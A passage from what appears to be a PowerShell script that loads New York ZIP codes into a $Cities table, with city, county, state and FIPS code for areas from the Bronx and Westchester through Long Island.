$Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10459") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10460") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10461") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10462") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10463") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10464") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10465") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10466") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10467") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10468") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10469") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10470") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10471") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10472") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10473") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10474") + $null = $Cities.Rows.Add("Bronx","Bronx","New york","NY","36","10475") + $null = $Cities.Rows.Add("Zcta 104hh","Bronx","New york","NY","36","104HH") + $null = $Cities.Rows.Add("Amawalk","Westchester","New york","NY","36","10501") + $null = $Cities.Rows.Add("Ardsley","Westchester","New york","NY","36","10502") + $null = $Cities.Rows.Add("Ardsley on hudso","Westchester","New york","NY","36","10503") + $null = $Cities.Rows.Add("Armonk","Westchester","New york","NY","36","10504") + $null = $Cities.Rows.Add("Bedford","Westchester","New york","NY","36","10506") + $null = $Cities.Rows.Add("Bedford hills","Westchester","New york","NY","36","10507") + $null = $Cities.Rows.Add("Brewster","Putnam","New york","NY","36","10509") + $null = $Cities.Rows.Add("Briarcliff manor","Westchester","New york","NY","36","10510") + $null = $Cities.Rows.Add("Buchanan","Westchester","New york","NY","36","10511") + $null = $Cities.Rows.Add("Carmel","Putnam","New york","NY","36","10512") + $null = $Cities.Rows.Add("Chappaqua","Westchester","New york","NY","36","10514") + $null = $Cities.Rows.Add("Cold spring","Putnam","New york","NY","36","10516") + $null = $Cities.Rows.Add("Cross river","Westchester","New york","NY","36","10518") + $null = $Cities.Rows.Add("Croton falls","Westchester","New york","NY","36","10519") + $null = $Cities.Rows.Add("Croton on hudson","Westchester","New york","NY","36","10520") + $null = $Cities.Rows.Add("Dobbs ferry","Westchester","New york","NY","36","10522") + $null = $Cities.Rows.Add("Elmsford","Westchester","New york","NY","36","10523") + $null = $Cities.Rows.Add("Garrison","Putnam","New york","NY","36","10524") + $null = $Cities.Rows.Add("Goldens bridge","Westchester","New york","NY","36","10526") + $null = $Cities.Rows.Add("Granite springs","Westchester","New york","NY","36","10527") + $null = $Cities.Rows.Add("Harrison","Westchester","New york","NY","36","10528") + $null = $Cities.Rows.Add("Hartsdale","Westchester","New york","NY","36","10530") + $null = $Cities.Rows.Add("Hawthorne","Westchester","New york","NY","36","10532") + $null = $Cities.Rows.Add("Irvington","Westchester","New york","NY","36","10533") + $null = $Cities.Rows.Add("Jefferson valley","Westchester","New york","NY","36","10535") + $null = $Cities.Rows.Add("Katonah","Westchester","New york","NY","36","10536") + $null = $Cities.Rows.Add("Lake peekskill","Putnam","New york","NY","36","10537") + $null = $Cities.Rows.Add("Larchmont","Westchester","New york","NY","36","10538") + $null = $Cities.Rows.Add("Mahopac","Putnam","New york","NY","36","10541") + $null = $Cities.Rows.Add("Mamaroneck","Westchester","New york","NY","36","10543") + $null = $Cities.Rows.Add("Millwood","Westchester","New york","NY","36","10546") + $null = $Cities.Rows.Add("Mohegan lake","Westchester","New york","NY","36","10547") + $null = $Cities.Rows.Add("Montrose","Westchester","New york","NY","36","10548") + $null = $Cities.Rows.Add("Mount kisco","Westchester","New york","NY","36","10549") + $null = $Cities.Rows.Add("Mount vernon","Westchester","New york","NY","36","10550") + $null = $Cities.Rows.Add("Mount vernon","Westchester","New york","NY","36","10552") + $null = $Cities.Rows.Add("Mount vernon","Westchester","New york","NY","36","10553") + $null = $Cities.Rows.Add("North salem","Westchester","New york","NY","36","10560") + $null = $Cities.Rows.Add("Ossining","Westchester","New york","NY","36","10562") + $null = $Cities.Rows.Add("Cortlandt manor","Westchester","New york","NY","36","10566") + $null = $Cities.Rows.Add("Zcta 10567","Westchester","New york","NY","36","10567") + $null = $Cities.Rows.Add("Pleasantville","Westchester","New york","NY","36","10570") + $null = $Cities.Rows.Add("Rye brook","Westchester","New york","NY","36","10573") + $null = $Cities.Rows.Add("Pound ridge","Westchester","New york","NY","36","10576") + $null = $Cities.Rows.Add("Purchase","Westchester","New york","NY","36","10577") + $null = $Cities.Rows.Add("Purdys","Westchester","New york","NY","36","10578") + $null = $Cities.Rows.Add("Putnam valley","Putnam","New york","NY","36","10579") + $null = $Cities.Rows.Add("Rye","Westchester","New york","NY","36","10580") + $null = $Cities.Rows.Add("Heathcote","Westchester","New york","NY","36","10583") + $null = $Cities.Rows.Add("Shrub oak","Westchester","New york","NY","36","10588") + $null = $Cities.Rows.Add("Somers","Westchester","New york","NY","36","10589") + $null = $Cities.Rows.Add("South salem","Westchester","New york","NY","36","10590") + $null = $Cities.Rows.Add("North tarrytown","Westchester","New york","NY","36","10591") + $null = $Cities.Rows.Add("Thornwood","Westchester","New york","NY","36","10594") + $null = $Cities.Rows.Add("Valhalla","Westchester","New york","NY","36","10595") + $null = $Cities.Rows.Add("Waccabuc","Westchester","New york","NY","36","10597") + $null = $Cities.Rows.Add("Yorktown heights","Westchester","New york","NY","36","10598") + $null = $Cities.Rows.Add("Zcta 105hh","Putnam","New york","NY","36","105HH") + $null = $Cities.Rows.Add("White plains","Westchester","New york","NY","36","10601") + $null = $Cities.Rows.Add("White plains","Westchester","New york","NY","36","10603") + $null = $Cities.Rows.Add("East white plain","Westchester","New york","NY","36","10604") + $null = $Cities.Rows.Add("White plains","Westchester","New york","NY","36","10605") + $null = $Cities.Rows.Add("White plains","Westchester","New york","NY","36","10606") + $null = $Cities.Rows.Add("White plains","Westchester","New york","NY","36","10607") + $null = $Cities.Rows.Add("Zcta 106hh","Westchester","New york","NY","36","106HH") + $null = $Cities.Rows.Add("Yonkers","Westchester","New york","NY","36","10701") + $null = $Cities.Rows.Add("Yonkers","Westchester","New york","NY","36","10703") + $null = $Cities.Rows.Add("Yonkers","Westchester","New york","NY","36","10704") + $null = $Cities.Rows.Add("Yonkers","Westchester","New york","NY","36","10705") + $null = $Cities.Rows.Add("Hastings on huds","Westchester","New york","NY","36","10706") + $null = $Cities.Rows.Add("Tuckahoe","Westchester","New york","NY","36","10707") + $null = $Cities.Rows.Add("Bronxville","Westchester","New york","NY","36","10708") + $null = $Cities.Rows.Add("Eastchester","Westchester","New york","NY","36","10709") + $null = $Cities.Rows.Add("Yonkers","Westchester","New york","NY","36","10710") + $null = $Cities.Rows.Add("Zcta 107hh","Westchester","New york","NY","36","107HH") + $null = $Cities.Rows.Add("New rochelle","Westchester","New york","NY","36","10801") + $null = $Cities.Rows.Add("Pelham","Westchester","New york","NY","36","10803") + $null = $Cities.Rows.Add("New rochelle","Westchester","New york","NY","36","10804") + $null = $Cities.Rows.Add("New rochelle","Westchester","New york","NY","36","10805") + $null = $Cities.Rows.Add("Zcta 108hh","Westchester","New york","NY","36","108HH") + $null = $Cities.Rows.Add("Suffern","Rockland","New york","NY","36","10901") + $null = $Cities.Rows.Add("Blauvelt","Rockland","New york","NY","36","10913") + $null = $Cities.Rows.Add("Campbell hall","Orange","New york","NY","36","10916") + $null = $Cities.Rows.Add("Central valley","Orange","New york","NY","36","10917") + $null = $Cities.Rows.Add("Chester","Orange","New york","NY","36","10918") + $null = $Cities.Rows.Add("Circleville","Orange","New york","NY","36","10919") + $null = $Cities.Rows.Add("Congers","Rockland","New york","NY","36","10920") + $null = $Cities.Rows.Add("Florida","Orange","New york","NY","36","10921") + $null = $Cities.Rows.Add("Garnerville","Rockland","New york","NY","36","10923") + $null = $Cities.Rows.Add("Goshen","Orange","New york","NY","36","10924") + $null = $Cities.Rows.Add("Greenwood lake","Orange","New york","NY","36","10925") + $null = $Cities.Rows.Add("Harriman","Orange","New york","NY","36","10926") + $null = $Cities.Rows.Add("Haverstraw","Rockland","New york","NY","36","10927") + $null = $Cities.Rows.Add("Highland falls","Orange","New york","NY","36","10928") + $null = $Cities.Rows.Add("Highland mills","Orange","New york","NY","36","10930") + $null = $Cities.Rows.Add("Hillburn","Rockland","New york","NY","36","10931") + $null = $Cities.Rows.Add("Scotchtown","Orange","New york","NY","36","10940") + $null = $Cities.Rows.Add("Middletown","Orange","New york","NY","36","10941") + $null = $Cities.Rows.Add("Monroe","Orange","New york","NY","36","10950") + $null = $Cities.Rows.Add("Monsey","Rockland","New york","NY","36","10952") + $null = $Cities.Rows.Add("Bardonia","Rockland","New york","NY","36","10954") + $null = $Cities.Rows.Add("New city","Rockland","New york","NY","36","10956") + $null = $Cities.Rows.Add("New hampton","Orange","New york","NY","36","10958") + $null = $Cities.Rows.Add("Nyack","Rockland","New york","NY","36","10960") + $null = $Cities.Rows.Add("Orangeburg","Rockland","New york","NY","36","10962") + $null = $Cities.Rows.Add("Otisville","Orange","New york","NY","36","10963") + $null = $Cities.Rows.Add("Palisades","Rockland","New york","NY","36","10964") + $null = $Cities.Rows.Add("Pearl river","Rockland","New york","NY","36","10965") + $null = $Cities.Rows.Add("Piermont","Rockland","New york","NY","36","10968") + $null = $Cities.Rows.Add("Pine island","Orange","New york","NY","36","10969") + $null = $Cities.Rows.Add("Pomona","Rockland","New york","NY","36","10970") + $null = $Cities.Rows.Add("Slate hill","Orange","New york","NY","36","10973") + $null = $Cities.Rows.Add("Sterlington","Rockland","New york","NY","36","10974") + $null = $Cities.Rows.Add("Southfields","Orange","New york","NY","36","10975") + $null = $Cities.Rows.Add("Sparkill","Rockland","New york","NY","36","10976") + $null = $Cities.Rows.Add("Chestnut ridge","Rockland","New york","NY","36","10977") + $null = $Cities.Rows.Add("Stony point","Rockland","New york","NY","36","10980") + $null = $Cities.Rows.Add("Tappan","Rockland","New york","NY","36","10983") + $null = $Cities.Rows.Add("Thiells","Rockland","New york","NY","36","10984") + $null = $Cities.Rows.Add("Thompson ridge","Orange","New york","NY","36","10985") + $null = $Cities.Rows.Add("Tomkins cove","Rockland","New york","NY","36","10986") + $null = $Cities.Rows.Add("Tuxedo park","Orange","New york","NY","36","10987") + $null = $Cities.Rows.Add("Valley cottage","Rockland","New york","NY","36","10989") + $null = $Cities.Rows.Add("Warwick","Orange","New york","NY","36","10990") + $null = $Cities.Rows.Add("Washingtonville","Orange","New york","NY","36","10992") + $null = $Cities.Rows.Add("West haverstraw","Rockland","New york","NY","36","10993") + $null = $Cities.Rows.Add("West nyack","Rockland","New york","NY","36","10994") + $null = $Cities.Rows.Add("West point","Orange","New york","NY","36","10996") + $null = $Cities.Rows.Add("Westtown","Orange","New york","NY","36","10998") + $null = $Cities.Rows.Add("Zcta 109hh","Orange","New york","NY","36","109HH") + $null = $Cities.Rows.Add("Zcta 109xx","Orange","New york","NY","36","109XX") + $null = $Cities.Rows.Add("Floral park","Nassau","New york","NY","36","11001") + $null = $Cities.Rows.Add("Alden manor","Nassau","New york","NY","36","11003") + $null = $Cities.Rows.Add("Glen oaks","Queens","New york","NY","36","11004") + $null = $Cities.Rows.Add("Floral park","Queens","New york","NY","36","11005") + $null = $Cities.Rows.Add("Franklin square","Nassau","New york","NY","36","11010") + $null = $Cities.Rows.Add("Great neck","Nassau","New york","NY","36","11020") + $null = $Cities.Rows.Add("Great neck","Nassau","New york","NY","36","11021") + $null = $Cities.Rows.Add("Great neck","Nassau","New york","NY","36","11023") + $null = $Cities.Rows.Add("Kings point cont","Nassau","New york","NY","36","11024") + $null = $Cities.Rows.Add("Plandome","Nassau","New york","NY","36","11030") + $null = $Cities.Rows.Add("Hillside manor","Nassau","New york","NY","36","11040") + $null = $Cities.Rows.Add("New hyde park","Nassau","New york","NY","36","11042") + $null = $Cities.Rows.Add("Port washington","Nassau","New york","NY","36","11050") + $null = $Cities.Rows.Add("Zcta 11096","Nassau","New york","NY","36","11096") + $null = $Cities.Rows.Add("Zcta 110hh","Nassau","New york","NY","36","110HH") + $null = $Cities.Rows.Add("Astoria","Queens","New york","NY","36","11101") + $null = $Cities.Rows.Add("Astoria","Queens","New york","NY","36","11102") + $null = $Cities.Rows.Add("Astoria","Queens","New york","NY","36","11103") + $null = $Cities.Rows.Add("Sunnyside","Queens","New york","NY","36","11104") + $null = $Cities.Rows.Add("Astoria","Queens","New york","NY","36","11105") + $null = $Cities.Rows.Add("Astoria","Queens","New york","NY","36","11106") + $null = $Cities.Rows.Add("Zcta 111hh","Queens","New york","NY","36","111HH") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11201") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11203") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11204") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11205") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11206") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11207") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11208") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11209") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11210") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11211") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11212") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11213") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11214") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11215") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11216") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11217") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11218") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11219") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11220") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11221") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11222") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11223") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11224") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11225") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11226") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11228") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11229") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11230") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11231") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11232") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11233") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11234") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11235") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11236") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11237") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11238") + $null = $Cities.Rows.Add("Brooklyn","Kings","New york","NY","36","11239") + $null = $Cities.Rows.Add("Zcta 112hh","Kings","New york","NY","36","112HH") + $null = $Cities.Rows.Add("Flushing","Queens","New york","NY","36","11354") + $null = $Cities.Rows.Add("Flushing","Queens","New york","NY","36","11355") + $null = $Cities.Rows.Add("College point","Queens","New york","NY","36","11356") + $null = $Cities.Rows.Add("Whitestone","Queens","New york","NY","36","11357") + $null = $Cities.Rows.Add("Flushing","Queens","New york","NY","36","11358") + $null = $Cities.Rows.Add("Bayside","Queens","New york","NY","36","11360") + $null = $Cities.Rows.Add("Bayside","Queens","New york","NY","36","11361") + $null = $Cities.Rows.Add("Little neck","Queens","New york","NY","36","11362") + $null = $Cities.Rows.Add("Little neck","Queens","New york","NY","36","11363") + $null = $Cities.Rows.Add("Flushing","Queens","New york","NY","36","11364") + $null = $Cities.Rows.Add("Fresh meadows","Queens","New york","NY","36","11365") + $null = $Cities.Rows.Add("Fresh meadows","Queens","New york","NY","36","11366") + $null = $Cities.Rows.Add("Flushing","Queens","New york","NY","36","11367") + $null = $Cities.Rows.Add("Corona","Queens","New york","NY","36","11368") + $null = $Cities.Rows.Add("East elmhurst","Queens","New york","NY","36","11369") + $null = $Cities.Rows.Add("East elmhurst","Queens","New york","NY","36","11370") + $null = $Cities.Rows.Add("Flushing","Queens","New york","NY","36","11371") + $null = $Cities.Rows.Add("Jackson heights","Queens","New york","NY","36","11372") + $null = $Cities.Rows.Add("Jackson heights","Queens","New york","NY","36","11373") + $null = $Cities.Rows.Add("Rego park","Queens","New york","NY","36","11374") + $null = $Cities.Rows.Add("Forest hills","Queens","New york","NY","36","11375") + $null = $Cities.Rows.Add("Woodside","Queens","New york","NY","36","11377") + $null = $Cities.Rows.Add("Maspeth","Queens","New york","NY","36","11378") + $null = $Cities.Rows.Add("Middle village","Queens","New york","NY","36","11379") + $null = $Cities.Rows.Add("Ridgewood","Queens","New york","NY","36","11385") + $null = $Cities.Rows.Add("Zcta 113hh","Queens","New york","NY","36","113HH") + $null = $Cities.Rows.Add("Cambria heights","Queens","New york","NY","36","11411") + $null = $Cities.Rows.Add("Kew gardens","Queens","New york","NY","36","11412") + $null = $Cities.Rows.Add("Springfield gard","Queens","New york","NY","36","11413") + $null = $Cities.Rows.Add("Kew gardens","Queens","New york","NY","36","11414") + $null = $Cities.Rows.Add("Kew gardens","Queens","New york","NY","36","11415") + $null = $Cities.Rows.Add("Ozone park","Queens","New york","NY","36","11416") + $null = $Cities.Rows.Add("Ozone park","Queens","New york","NY","36","11417") + $null = $Cities.Rows.Add("Richmond hill","Queens","New york","NY","36","11418") + $null = $Cities.Rows.Add("S richmond hill","Queens","New york","NY","36","11419") + $null = $Cities.Rows.Add("S ozone park","Queens","New york","NY","36","11420") + $null = $Cities.Rows.Add("Woodhaven","Queens","New york","NY","36","11421") + $null = $Cities.Rows.Add("Rosedale","Queens","New york","NY","36","11422") + $null = $Cities.Rows.Add("Hollis","Queens","New york","NY","36","11423") + $null = $Cities.Rows.Add("Bellerose","Queens","New york","NY","36","11426") + $null = $Cities.Rows.Add("Queens village","Queens","New york","NY","36","11427") + $null = $Cities.Rows.Add("Queens village","Queens","New york","NY","36","11428") + $null = $Cities.Rows.Add("Queens village","Queens","New york","NY","36","11429") + $null = $Cities.Rows.Add("Jamaica","Queens","New york","NY","36","11430") + $null = $Cities.Rows.Add("Jamaica","Queens","New york","NY","36","11432") + $null = $Cities.Rows.Add("Jamaica","Queens","New york","NY","36","11433") + $null = $Cities.Rows.Add("Jamaica","Queens","New york","NY","36","11434") + $null = $Cities.Rows.Add("Jamaica","Queens","New york","NY","36","11435") + $null = $Cities.Rows.Add("Jamaica","Queens","New york","NY","36","11436") + $null = $Cities.Rows.Add("Zcta 114hh","Nassau","New york","NY","36","114HH") + $null = $Cities.Rows.Add("Mineola","Nassau","New york","NY","36","11501") + $null = $Cities.Rows.Add("Albertson","Nassau","New york","NY","36","11507") + $null = $Cities.Rows.Add("Atlantic beach","Nassau","New york","NY","36","11509") + $null = $Cities.Rows.Add("Baldwin","Nassau","New york","NY","36","11510") + $null = $Cities.Rows.Add("Carle place","Nassau","New york","NY","36","11514") + $null = $Cities.Rows.Add("Cedarhurst","Nassau","New york","NY","36","11516") + $null = $Cities.Rows.Add("East rockaway","Nassau","New york","NY","36","11518") + $null = $Cities.Rows.Add("Freeport","Nassau","New york","NY","36","11520") + $null = $Cities.Rows.Add("Garden city","Nassau","New york","NY","36","11530") + $null = $Cities.Rows.Add("Glen cove","Nassau","New york","NY","36","11542") + $null = $Cities.Rows.Add("Glen head","Nassau","New york","NY","36","11545") + $null = $Cities.Rows.Add("Glenwood landing","Nassau","New york","NY","36","11547") + $null = $Cities.Rows.Add("Greenvale","Nassau","New york","NY","36","11548") + $null = $Cities.Rows.Add("Hempstead","Nassau","New york","NY","36","11550") + $null = $Cities.Rows.Add("West hempstead","Nassau","New york","NY","36","11552") + $null = $Cities.Rows.Add("Uniondale","Nassau","New york","NY","36","11553") + $null = $Cities.Rows.Add("East meadow","Nassau","New york","NY","36","11554") + $null = $Cities.Rows.Add("Hewlett","Nassau","New york","NY","36","11557") + $null = $Cities.Rows.Add("Island park","Nassau","New york","NY","36","11558") + $null = $Cities.Rows.Add("Lawrence","Nassau","New york","NY","36","11559") + $null = $Cities.Rows.Add("Locust valley","Nassau","New york","NY","36","11560") + $null = $Cities.Rows.Add("Long beach","Nassau","New york","NY","36","11561") + $null = $Cities.Rows.Add("Lynbrook","Nassau","New york","NY","36","11563") + $null = $Cities.Rows.Add("Malverne","Nassau","New york","NY","36","11565") + $null = $Cities.Rows.Add("North merrick","Nassau","New york","NY","36","11566") + $null = $Cities.Rows.Add("Old westbury","Nassau","New york","NY","36","11568") + $null = $Cities.Rows.Add("Point lookout","Nassau","New york","NY","36","11569") + $null = $Cities.Rows.Add("Rockville centre","Nassau","New york","NY","36","11570") + $null = $Cities.Rows.Add("Oceanside","Nassau","New york","NY","36","11572") + $null = $Cities.Rows.Add("Roosevelt","Nassau","New york","NY","36","11575") + $null = $Cities.Rows.Add("Roslyn","Nassau","New york","NY","36","11576") + $null = $Cities.Rows.Add("Roslyn heights","Nassau","New york","NY","36","11577") + $null = $Cities.Rows.Add("Sea cliff","Nassau","New york","NY","36","11579") + $null = $Cities.Rows.Add("Valley stream","Nassau","New york","NY","36","11580") + $null = $Cities.Rows.Add("North woodmere","Nassau","New york","NY","36","11581") + $null = $Cities.Rows.Add("Westbury","Nassau","New york","NY","36","11590") + $null = $Cities.Rows.Add("Williston park","Nassau","New york","NY","36","11596") + $null = $Cities.Rows.Add("Woodmere","Nassau","New york","NY","36","11598") + $null = $Cities.Rows.Add("Zcta 115hh","Nassau","New york","NY","36","115HH") + $null = $Cities.Rows.Add("Far rockaway","Queens","New york","NY","36","11691") + $null = $Cities.Rows.Add("Far rockaway","Queens","New york","NY","36","11692") + $null = $Cities.Rows.Add("Far rockaway","Queens","New york","NY","36","11693") + $null = $Cities.Rows.Add("Far rockaway","Queens","New york","NY","36","11694") + $null = $Cities.Rows.Add("Far rockaway","Queens","New york","NY","36","11697") + $null = $Cities.Rows.Add("Zcta 116hh","Queens","New york","NY","36","116HH") + $null = $Cities.Rows.Add("Amityville","Suffolk","New york","NY","36","11701") + $null = $Cities.Rows.Add("Oak beach","Suffolk","New york","NY","36","11702") + $null = $Cities.Rows.Add("North babylon","Suffolk","New york","NY","36","11703") + $null = $Cities.Rows.Add("West babylon","Suffolk","New york","NY","36","11704") + $null = $Cities.Rows.Add("Bayport","Suffolk","New york","NY","36","11705") + $null = $Cities.Rows.Add("Kismet","Suffolk","New york","NY","36","11706") + $null = $Cities.Rows.Add("Bayville","Nassau","New york","NY","36","11709") + $null = $Cities.Rows.Add("North bellmore","Nassau","New york","NY","36","11710") + $null = $Cities.Rows.Add("Bellport","Suffolk","New york","NY","36","11713") + $null = $Cities.Rows.Add("Bethpage","Nassau","New york","NY","36","11714") + $null = $Cities.Rows.Add("Blue point","Suffolk","New york","NY","36","11715") + $null = $Cities.Rows.Add("Bohemia","Suffolk","New york","NY","36","11716") + $null = $Cities.Rows.Add("West brentwood","Suffolk","New york","NY","36","11717") + $null = $Cities.Rows.Add("Brightwaters","Suffolk","New york","NY","36","11718") + $null = $Cities.Rows.Add("Brookhaven","Suffolk","New york","NY","36","11719") + $null = $Cities.Rows.Add("Centereach","Suffolk","New york","NY","36","11720") + $null = $Cities.Rows.Add("Centerport","Suffolk","New york","NY","36","11721") + $null = $Cities.Rows.Add("Central islip","Suffolk","New york","NY","36","11722") + $null = $Cities.Rows.Add("Cold spring harb","Suffolk","New york","NY","36","11724") + $null = $Cities.Rows.Add("Commack","Suffolk","New york","NY","36","11725") + $null = $Cities.Rows.Add("Copiague","Suffolk","New york","NY","36","11726") + $null = $Cities.Rows.Add("Coram","Suffolk","New york","NY","36","11727") + $null = $Cities.Rows.Add("Deer park","Suffolk","New york","NY","36","11729") + $null = $Cities.Rows.Add("East islip","Suffolk","New york","NY","36","11730") + $null = $Cities.Rows.Add("Elwood","Suffolk","New york","NY","36","11731") + $null = $Cities.Rows.Add("East norwich","Nassau","New york","NY","36","11732") + $null = $Cities.Rows.Add("Setauket","Suffolk","New york","NY","36","11733") + $null = $Cities.Rows.Add("South farmingdal","Nassau","New york","NY","36","11735") + $null = $Cities.Rows.Add("Farmingville","Suffolk","New york","NY","36","11738") + $null = $Cities.Rows.Add("Greenlawn","Suffolk","New york","NY","36","11740") + $null = $Cities.Rows.Add("Holbrook","Suffolk","New york","NY","36","11741") + $null = $Cities.Rows.Add("Holtsville","Suffolk","New york","NY","36","11742") + $null = $Cities.Rows.Add("Halesite","Suffolk","New york","NY","36","11743") + $null = $Cities.Rows.Add("Dix hills","Suffolk","New york","NY","36","11746") + $null = $Cities.Rows.Add("Melville","Suffolk","New york","NY","36","11747") + $null = $Cities.Rows.Add("Islip","Suffolk","New york","NY","36","11751") + $null = $Cities.Rows.Add("Islip terrace","Suffolk","New york","NY","36","11752") + $null = $Cities.Rows.Add("Jericho","Nassau","New york","NY","36","11753") + $null = $Cities.Rows.Add("Kings park","Suffolk","New york","NY","36","11754") + $null = $Cities.Rows.Add("Lake grove","Suffolk","New york","NY","36","11755") + $null = $Cities.Rows.Add("Levittown","Nassau","New york","NY","36","11756") + $null = $Cities.Rows.Add("Lindenhurst","Suffolk","New york","NY","36","11757") + $null = $Cities.Rows.Add("North massapequa","Nassau","New york","NY","36","11758") + $null = $Cities.Rows.Add("Massapequa park","Nassau","New york","NY","36","11762") + $null = $Cities.Rows.Add("Medford","Suffolk","New york","NY","36","11763") + $null = $Cities.Rows.Add("Miller place","Suffolk","New york","NY","36","11764") + $null = $Cities.Rows.Add("Mill neck","Nassau","New york","NY","36","11765") + $null = $Cities.Rows.Add("Mount sinai","Suffolk","New york","NY","36","11766") + $null = $Cities.Rows.Add("Nesconset","Suffolk","New york","NY","36","11767") + $null = $Cities.Rows.Add("Northport","Suffolk","New york","NY","36","11768") + $null = $Cities.Rows.Add("Oakdale","Suffolk","New york","NY","36","11769") + $null = $Cities.Rows.Add("Ocean beach","Suffolk","New york","NY","36","11770") + $null = $Cities.Rows.Add("Oyster bay","Nassau","New york","NY","36","11771") + $null = $Cities.Rows.Add("Davis park","Suffolk","New york","NY","36","11772") + $null = $Cities.Rows.Add("Port jefferson s","Suffolk","New york","NY","36","11776") + $null = $Cities.Rows.Add("Port jefferson","Suffolk","New york","NY","36","11777") + $null = $Cities.Rows.Add("Rocky point","Suffolk","New york","NY","36","11778") + $null = $Cities.Rows.Add("Lake ronkonkoma","Suffolk","New york","NY","36","11779") + $null = $Cities.Rows.Add("Saint james","Suffolk","New york","NY","36","11780") + $null = $Cities.Rows.Add("Cherry grove","Suffolk","New york","NY","36","11782") + $null = $Cities.Rows.Add("Seaford","Nassau","New york","NY","36","11783") + $null = $Cities.Rows.Add("Selden","Suffolk","New york","NY","36","11784") + $null = $Cities.Rows.Add("Shoreham","Suffolk","New york","NY","36","11786") + $null = $Cities.Rows.Add("Smithtown","Suffolk","New york","NY","36","11787") + $null = $Cities.Rows.Add("Hauppauge","Suffolk","New york","NY","36","11788") + $null = $Cities.Rows.Add("Sound beach","Suffolk","New york","NY","36","11789") + $null = $Cities.Rows.Add("Stony brook","Suffolk","New york","NY","36","11790") + $null = $Cities.Rows.Add("Syosset","Nassau","New york","NY","36","11791") + $null = $Cities.Rows.Add("Wading river","Suffolk","New york","NY","36","11792") + $null = $Cities.Rows.Add("Wantagh","Nassau","New york","NY","36","11793") + $null = $Cities.Rows.Add("West islip","Suffolk","New york","NY","36","11795") + $null = $Cities.Rows.Add("West sayville","Suffolk","New york","NY","36","11796") + $null = $Cities.Rows.Add("Woodbury","Nassau","New york","NY","36","11797") + $null = $Cities.Rows.Add("Wheatley heights","Suffolk","New york","NY","36","11798") + $null = $Cities.Rows.Add("Zcta 117hh","Nassau","New york","NY","36","117HH") + $null = $Cities.Rows.Add("Hicksville","Nassau","New york","NY","36","11801") + $null = $Cities.Rows.Add("Plainview","Nassau","New york","NY","36","11803") + $null = $Cities.Rows.Add("Old bethpage","Nassau","New york","NY","36","11804") + $null = $Cities.Rows.Add("Riverhead","Suffolk","New york","NY","36","11901") + $null = $Cities.Rows.Add("Amagansett","Suffolk","New york","NY","36","11930") + $null = $Cities.Rows.Add("Bridgehampton","Suffolk","New york","NY","36","11932") + $null = $Cities.Rows.Add("Calverton","Suffolk","New york","NY","36","11933") + $null = $Cities.Rows.Add("Center moriches","Suffolk","New york","NY","36","11934") + $null = $Cities.Rows.Add("Cutchogue","Suffolk","New york","NY","36","11935") + $null = $Cities.Rows.Add("East hampton","Suffolk","New york","NY","36","11937") + $null = $Cities.Rows.Add("East marion","Suffolk","New york","NY","36","11939") + $null = $Cities.Rows.Add("East moriches","Suffolk","New york","NY","36","11940") + $null = $Cities.Rows.Add("Eastport","Suffolk","New york","NY","36","11941") + $null = $Cities.Rows.Add("East quogue","Suffolk","New york","NY","36","11942") + $null = $Cities.Rows.Add("Greenport","Suffolk","New york","NY","36","11944") + $null = $Cities.Rows.Add("Hampton bays","Suffolk","New york","NY","36","11946") + $null 